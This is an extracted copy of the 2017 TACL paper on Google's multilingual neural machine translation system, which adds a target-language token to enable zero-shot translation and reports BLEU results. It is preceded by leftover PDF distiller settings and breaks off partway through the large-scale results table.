/CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_sgan6o56yzdw3a2lwkfmts7jma ---- Google’s Multilingual Neural Machine Translation System: Enabling Zero-Shot Translation Melvin Johnson∗, Mike Schuster∗, Quoc V. Le, Maxim Krikun, Yonghui Wu, Zhifeng Chen, Nikhil Thorat, Fernanda Viégas, Martin Wattenberg, Greg Corrado, Macduff Hughes, Jeffrey Dean Google {melvinp,schuster}@google.com Abstract We propose a simple solution to use a single Neural Machine Translation (NMT) model to translate between multiple languages. Our solu- tion requires no changes to the model architec- ture from a standard NMT system but instead introduces an artificial token at the beginning of the input sentence to specify the required target language. Using a shared wordpiece vo- cabulary, our approach enables Multilingual NMT systems using a single model. On the WMT’14 benchmarks, a single multilingual model achieves comparable performance for English→French and surpasses state-of-the- art results for English→German. Similarly, a single multilingual model surpasses state- of-the-art results for French→English and German→English on WMT’14 and WMT’15 benchmarks, respectively. On production cor- pora, multilingual models of up to twelve language pairs allow for better translation of many individual pairs. Our models can also learn to perform implicit bridging between lan- guage pairs never seen explicitly during train- ing, showing that transfer learning and zero- shot translation is possible for neural transla- tion. Finally, we show analyses that hints at a universal interlingua representation in our mod- els and also show some interesting examples when mixing languages. 1 Introduction End-to-end Neural Machine Translation (NMT) (Sutskever et al., 2014; Bahdanau et al., 2015; Cho et al., 2014) is an approach to machine ∗Corresponding authors. translation that has rapidly gained adoption in many large-scale settings (Zhou et al., 2016; Wu et al., 2016; Crego and et al., 2016). Almost all such systems are built for a single language pair — so far there has not been a sufficiently simple and efficient way to handle multiple language pairs using a single model without making significant changes to the basic NMT architecture. In this paper we introduce a simple method to translate between multiple languages using a single model, taking advantage of multilingual data to im- prove NMT for all languages involved. Our method requires no change to the traditional NMT model architecture. Instead, we add an artificial token to the input sequence to indicate the required target lan- guage, a simple amendment to the data only. All other parts of the system — encoder, decoder, atten- tion, and shared wordpiece vocabulary as described in Wu et al., (2016) — stay exactly the same. This method has several attractive benefits: • Simplicity: Since no changes are made to the architecture of the model, scaling to more lan- guages is trivial — any new data is simply added, possibly with over- or under-sampling such that all languages are appropriately rep- resented, and used with a new token if the tar- get language changes. Since no changes are made to the training procedure, the mini-batches for training are just sampled from the overall mixed-language training data just like for the single-language case. Since no a-priori deci- sions about how to allocate parameters for dif- ferent languages are made, the system adapts automatically to use the total number of param- 339 Transactions of the Association for Computational Linguistics, vol. 5, pp. 339–351, 2017. Action Editor: Colin Cherry. Submission batch: 11/2016; Revision batch: 3/2017; Published 10/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. eters efficiently to minimize the global loss. A multilingual model architecture of this type also simplifies production deployment significantly since it can cut down the total number of mod- els necessary when dealing with multiple lan- guages. Note that at Google, we support a total of over 100 languages as source and target, so theoretically 1002 models would be necessary for the best possible translations between all pairs, if each model could only support a single language pair. Clearly this would be problem- atic in a production environment. Even when limiting to translating to/from English only, we still need over 200 models. Finally, batching to- gether many requests from potentially different source and target languages can significantly improve efficiency of the serving system. In comparison, an alternative system that requires language-dependent encoders, decoders or at- tention modules does not have any of the above advantages. • Low-resource language improvements: In a multilingual NMT model, all parameters are implicitly shared by all the language pairs being modeled. This forces the model to generalize across language boundaries during training. It is observed that when language pairs with little available data and language pairs with abundant data are mixed into a single model, translation quality on the low resource language pair is significantly improved. • Zero-shot translation: A surprising benefit of modeling several language pairs in a single model is that the model can learn to translate between language pairs it has never seen in this combination during training (zero-shot transla- tion) — a working example of transfer learn- ing within neural translation models. For ex- ample, a multilingual NMT model trained with Portuguese→English and English→Spanish ex- amples can generate reasonable translations for Portuguese→Spanish although it has not seen any data for that language pair. We show that the quality of zero-shot language pairs can easily be improved with little additional data of the lan- guage pair in question (a fact that has been pre- viously confirmed for a related approach which is discussed in more detail in the next section). In the remaining sections of this paper we first discuss related work and explain our multilingual system architecture in more detail. Then, we go through the different ways of merging languages on the source and target side in increasing diffi- culty (many-to-one, one-to-many, many-to-many), and discuss the results of a number of experiments on WMT benchmarks, as well as on some of Google’s large-scale production datasets. We present results from transfer learning experiments and show how implicitly-learned bridging (zero-shot translation) performs in comparison to explicit bridging (i.e., first translating to a common language like English and then translating from that common language into the desired target language) as typically used in machine translation systems. We describe visualizations of the new system in action, which provide early evidence of shared semantic representations (interlingua) be- tween languages. Finally we also show some interest- ing applications of mixing languages with examples: code-switching on the source side and weighted tar- get language mixing, and suggest possible avenues for further exploration. 2 Related Work Interlingual translation is a classic method in machine translation (Richens, 1958; Hutchins and Somers, 1992). Despite its distinguished history, most practi- cal applications of machine translation have focused on individual language pairs because it was simply too difficult to build a single system that translates reliably from and to several languages. Neural Machine Translation (NMT) (Kalchbren- ner and Blunsom, 2013) was shown to be a promis- ing end-to-end learning approach in Sutskever et al. (2014); Bahdanau et al. (2015); Cho et al. (2014) and was quickly extended to multilingual machine translation in various ways. An early attempt is the work in Dong et al., (2015), where the authors modify an attention-based encoder- decoder approach to perform multilingual NMT by adding a separate decoder and attention mechanism for each target language. In Luong et al., (2015a) multilingual training in a multitask learning setting is described. This model is also an encoder-decoder 340 network, in this case without an attention mechanism. To make proper use of multilingual data, they extend their model with multiple encoders and decoders, one for each supported source and target language. In Caglayan et al., (2016) the authors incorporate multiple modalities other than text into the encoder- decoder framework. Several other approaches have been proposed for multilingual training, especially for low-resource lan- guage pairs. For instance, in Zoph and Knight (2016) a form of multi-source translation was proposed where the model has multiple different encoders and different attention mechanisms for each source lan- guage. However, this work requires the presence of a multi-way parallel corpus between all the languages involved, which is difficult to obtain in practice. Most closely related to our approach is Firat et al., (2016a) in which the authors propose multi-way multilingual NMT using a single shared attention mechanism but multiple encoders/decoders for each source/target language. Recently in Lee et al., (2016) a CNN- based character-level encoder was proposed which is shared across multiple source languages. However, this approach can only perform translations into a single target language. Our approach is related to the multitask learning framework (Caruana, 1998). Despite its promise, this framework has seen limited practical success in real world applications. In speech recognition, there have been many successful reports of modeling multiple languages using a single model ( (Schultz and Kirch- hoff, 2006) for an extensive reference and references therein). Multilingual language processing has also shown to be successful in domains other than transla- tion (Gillick et al., 2016; Tsvetkov et al., 2016). There have been other approaches similar to ours in spirit, but used for very different purposes. In Sen- nrich et al.,(2016a), the NMT framework has been extended to control the politeness level of the target translation by adding a special token to the source sentence. The same idea was used in Yamagishi et al., (2016) to add the distinction between ‘active’ and ‘passive’ tense to the generated target sentence. Our method has an additional benefit not seen in other systems: it gives the system the ability to per- form zero-shot translation, meaning the system can translate from a source language to a target language without having seen explicit examples from this spe- cific language pair during training. Zero-shot trans- lation was the direct goal of Firat et al., (2016c). Although they were not able to achieve this direct goal, they were able to do what they call “zero- resource” translation by using their pre-trained multi- way multilingual model and later fine-tuning it with pseudo-parallel data generated by the model. It should be noted that the difference between “zero- shot” and “zero-resource” translation is the additional fine-tuning step which is required in the latter ap- proach. To the best of our knowledge, our work is the first to validate the use of true multilingual translation using a single encoder-decoder model, and is inci- dentally also already used in a production setting. It is also the first work to demonstrate the possibil- ity of zero-shot translation, a successful example of transfer learning in machine translation, without any additional steps. 3 System Architecture The multilingual model architecture is identical to Google’s Neural Machine Translation (GNMT) sys- tem (Wu et al., 2016) (with the optional addition of direct connections between encoder and decoder lay- ers which we have used for some of our experiments). To be able to make use of multilingual data within a single system, we propose one simple modification to the input data, which is to introduce an artificial token at the beginning of the input sentence to indi- cate the target language the model should translate to. For instance, consider the following En→Es pair of sentences: How are you? -> ¿Cómo estás? It will be modified to: <2es> How are you? -> ¿Cómo estás? to indicate that Spanish is the target language. Note that we don’t specify the source language – the model will learn this automatically. After adding the token to the input data, we train the model with all multilingual data consisting of multiple language pairs at once, possibly after over- or undersampling some of the data to adjust for the relative ratio of the language data available. To ad- dress the issue of translation of unknown words and to limit the vocabulary for computational efficiency, 341 we use a shared wordpiece model (Schuster and Nakajima, 2012) across all the source and target data used for training, usually with 32,000 word pieces. The segmentation algorithm used here is very similar (with small differences) to Byte-Pair-Encoding (BPE) which was described in Gage (1994) and was also used in Sennrich et al., (2016b) for machine transla- tion. All training is carried out similar to (Wu et al., 2016) and implemented in TensorFlow (Abadi and et al., 2016). In summary, this approach is the simplest among the alternatives that we are aware of. During training and inference, we only need to add one additional token to each sentence of the source data to specify the desired target language. 4 Experiments and Results In this section, we apply our proposed method to train multilingual models in several different configu- rations. Since we can have models with either single or multiple source/target languages we test three in- teresting cases for mapping languages: 1) many to one, 2) one to many, and 3) many to many. As al- ready discussed in Section 2, other models have been used to explore some of these cases already, but for completeness we apply our technique to these inter- esting use cases again to give a full picture of the effectiveness of our approach. We will also show results and discuss benefits of bringing together many (un)related languages in a single large-scale model trained on production data. Finally, we will present our findings on zero-shot translation where the model learns to translate be- tween pairs of languages for which no explicit par- allel examples existed in the training data, and show results of experiments where adding additional data improves zero-shot translation quality further. 4.1 Datasets, Training Protocols and Evaluation Metrics For WMT, we train our models on the WMT’14 En→Fr and the WMT’14 En→De datasets. In both cases, we use newstest2014 as the test sets to be able to compare against previous work (Luong et al., 2015c; Sébastien et al., 2015; Zhou et al., 2016; Wu et al., 2016). For WMT Fr→En and De→En we use newstest2014 and newstest2015 as test sets. De- spite training on WMT’14 data, which is somewhat smaller than WMT’15, we test our De→En model on newstest2015, similar to Luong et al., (2015b). The combination of newstest2012 and newstest2013 is used as the development set. In addition to WMT, we also evaluate the multilin- gual approach on some Google-internal large-scale production datasets representing a wide spectrum of languages with very distinct linguistic properties: En↔Japanese(Ja), En↔Korean(Ko), En↔Es, and En↔Pt. These datasets are two to three orders of magnitude larger than the WMT datasets. Our training protocols are mostly identical to those described in Wu et al., (2016). We find that some multilingual models take a little more time to train than single language pair models, likely because each language pair is seen only for a fraction of the train- ing process. We use larger batch sizes with a slightly higher initial learning rate to speed up the conver- gence of these models. We evaluate our models using the standard BLEU score metric and to make our results comparable to previous work (Sutskever et al., 2014; Luong et al., 2015c; Zhou et al., 2016; Wu et al., 2016), we report tokenized BLEU score as computed by the multi-bleu.pl script, which can be downloaded from the public implementation of Moses.1 To test the influence of varying amounts of train- ing data per language pair we explore two strategies when building multilingual models: a) where we oversample the data from all language pairs to be of the same size as the largest language pair, and b) where we mix the data as is without any change. The wordpiece model training is done after the optional oversampling taking into account all the changed data ratios. For the WMT models we report results using both of these strategies. For the production models, we always balance the data such that the ratios are equal. One benefit of the way we share all the components of the model is that the mini-batches can contain data from different language pairs during training and in- ference, which are typically just random samples from the final training and test data distributions. This is a simple way of preventing “catastrophic forgetting” - tendency for knowledge of previously 1http://www.statmt.org/moses/ 342 learned task(s) (e.g. language pair A) to be abruptly forgotten as information relevant to the current task (e.g. language pair B) is incorporated (French, 1999). Other approaches to multilingual translation require complex update scheduling mechanisms to prevent this effect (Firat et al., 2016b). 4.2 Many to One In this section we explore having multiple source lan- guages and a single target language — the simplest way of combining language pairs. Since there is only a single target language no additional source token is required. We perform three sets of experiments: • The first set of experiments is on the WMT datasets, where De→En and Fr→En are com- bined to train a multilingual model. Our base- lines are two single language pair models: De→En and Fr→En trained independently. We perform these experiments once with oversam- pling and once without. • The second set of experiments is on production data where we combine Ja→En and Ko→En, with oversampling. The baselines are two single language pair models trained independently. • Finally, the third set of experiments is on pro- duction data where we combine Es→En and Pt→En, with oversampling. The baselines are again two single language pair models trained independently. All of the multilingual and single language pair mod- els have the same total number of parameters as the baseline NMT models trained on a single language pair (using 1024 nodes, 8 LSTM layers and a shared wordpiece model vocabulary of 32k, a total of 255M parameters per model). A side effect of this equal choice of parameters is that it is presumably unfair to the multilingual models as the number of parameters available per language pair is reduced by a factor of N compared to the single language pair models, if N is the number of language pairs combined in the multilingual model. The multilingual model also has to handle the combined vocabulary of all the single models. We chose to keep the number of parameters constant for all models to simplify experimentation. We relax this constraint for some of the large-scale experiments shown further below. Table 1: Many to One: BLEU scores on for single lan- guage pair and multilingual models. ?: no oversampling Model Single Multi Diff WMT De→En 30.43 30.59 +0.16 WMT Fr→En 35.50 35.73 +0.23 WMT De→En? 30.43 30.54 +0.11 WMT Fr→En? 35.50 36.77 +1.27 Prod Ja→En 23.41 23.87 +0.46 Prod Ko→En 25.42 25.47 +0.05 Prod Es→En 38.00 38.73 +0.73 Prod Pt→En 44.40 45.19 +0.79 The results are presented in Table 1. For all ex- periments the multilingual models outperform the baseline single systems despite the above mentioned disadvantage with respect to the number of param- eters available per language pair. One possible hy- pothesis explaining the gains is that the model has been shown more English data on the target side, and that the source languages belong to the same language families, so the model has learned useful generalizations. For the WMT experiments, we obtain a maximum gain of +1.27 BLEU for Fr→En. Note that the re- sults on both the WMT test sets are better than other published state-of-the-art results for a single model, to the best of our knowledge. 4.3 One to Many In this section, we explore the application of our method when there is a single source language and multiple target languages. Here we need to prepend the input with an additional token to specify the target language. We perform three sets of experiments very similar to the previous section. Table 2 summarizes the results when performing translations into multiple target languages. We see that the multilingual models are comparable to, and in some cases outperform, the baselines, but not al- ways. We obtain a large gain of +0.9 BLEU for En→Es. Unlike the previous set of results, there are less significant gains in this setting. This is perhaps due to the fact that the decoder has a more difficult time translating into multiple target languages which may even have different scripts, which are combined into a single shared wordpiece vocabulary. Note that even for languages with entirely different scripts (e.g., Korean and Japanese) there is significant overlap in 343 wordpieces when real data is used, as often numbers, dates, names, websites, punctuation etc. are actually using a shared script (ASCII). Table 2: One to Many: BLEU scores for single language pair and multilingual models. ?: no oversampling Model Single Multi Diff WMT En→De 24.67 24.97 +0.30 WMT En→Fr 38.95 36.84 -2.11 WMT En→De? 24.67 22.61 -2.06 WMT En→Fr? 38.95 38.16 -0.79 Prod En→Ja 23.66 23.73 +0.07 Prod En→Ko 19.75 19.58 -0.17 Prod En→Es 34.50 35.40 +0.90 Prod En→Pt 38.40 38.63 +0.23 We observe that oversampling helps the smaller language pair (En→De) at the cost of lower quality for the larger language pair (En→Fr). The model without oversampling achieves better results on the larger language compared to the smaller one as ex- pected. We also find that this effect is more prominent on smaller datasets (WMT) and much less so on our much larger production datasets. 4.4 Many to Many In this section, we report on experiments when there are multiple source languages and multiple target languages within a single model — the most difficult setup. Since multiple target languages are given, the input needs to be prepended with the target language token as above. The results are presented in Table 3. We see that the multilingual production models with the same model size and vocabulary size as the single language models are quite close to the baselines – the average relative loss in BLEU score across all experiments is only approximately 2.5%. Although there are some significant losses in qual- ity from training many languages jointly using a model with the same total number of parameters as the single language pair models, these models re- duce the total complexity involved in training and productionization. 4.5 Large-scale Experiments This section shows the result of combining 12 produc- tion language pairs having a total of 3B parameters (255M per single model) into a single multilingual Table 3: Many to Many: BLEU scores for single language pair and multilingual models. ?: no oversampling Model Single Multi Diff WMT En→De 24.67 24.49 -0.18 WMT En→Fr 38.95 36.23 -2.72 WMT De→En 30.43 29.84 -0.59 WMT Fr→En 35.50 34.89 -0.61 WMT En→De? 24.67 21.92 -2.75 WMT En→Fr? 38.95 37.45 -1.50 WMT De→En? 30.43 29.22 -1.21 WMT Fr→En? 35.50 35.93 +0.43 Prod En→Ja 23.66 23.12 -0.54 Prod En→Ko 19.75 19.73 -0.02 Prod Ja→En 23.41 22.86 -0.55 Prod Ko→En 25.42 24.76 -0.66 Prod En→Es 34.50 34.69 +0.19 Prod En→Pt 38.40 37.25 -1.15 Prod Es→En 38.00 37.65 -0.35 Prod Pt→En 44.40 44.02 -0.38 model. A range of multilingual models were trained, starting from the same size as a single language pair model with 255M parameters (1024 nodes) up to 650M parameters (1792 nodes). As above, the input needs to be prepended with the target language to- ken. We oversample the examples from the smaller language pairs to balance the data as explained above. The results for single language pair models ver- sus multilingual models with increasing numbers of parameters are summarized in Table 4. We find that the multilingual models are on average worse than the single models (about 5.6% to 2.5% relative de- pending on size, however, some actually get better) and as expected the average difference gets smaller when going to larger multilingual models. It should be noted that the largest multilingual model we have trained has still about five times less parameters than the combined single models. The multilingual model also requires only roughly 1/12-th of the training time (or computing resources) to converge compared to the combined single models (total training time for all our models is still in the order of weeks). Another important point is that since we only train for a little longer than a standard single model, the individual language pairs can see as little as 1/12-th of the data in comparison to their single language pair models but still produce satisfactory results. In summary, multilingual NMT enables us to 344 Table 4: Large-scale experiments: BLEU scores for single language pair and multilingual models. Model Single Multi Multi Multi Multi #nodes 1024 1024 1280 1536 1792 #params 3B 255M 367M 499M 650M En→Ja 23.66 21.10 21.17 21.72 21.70 En→Ko 19.75 18.41 18.36 18.30 18.28 Ja→En 23.41 21.62 22.03 22.51 23.18 Ko→En 25.42 22.87 23.46 24.00 24.67 En→Es 34.50 34.25 34.40 34.77 34.70 En→Pt 38.40 37.35 37.42 37.80 37.92 Es→En 38.00 36.04 36.50 37.26 37.45 Pt→En 44.40 42.53 42.82 43.64 43.87 En→De 26.43 23.15 23.77 23.63 24.01 En→Fr 35.37 34.00 34.19 34.91 34.81 De→En 31.77 31.17 31.65 32.24 32.32 Fr→En 36.47 34.40 34.56 35.35 35.52 ave diff - -1.72 -1.43 -0.95 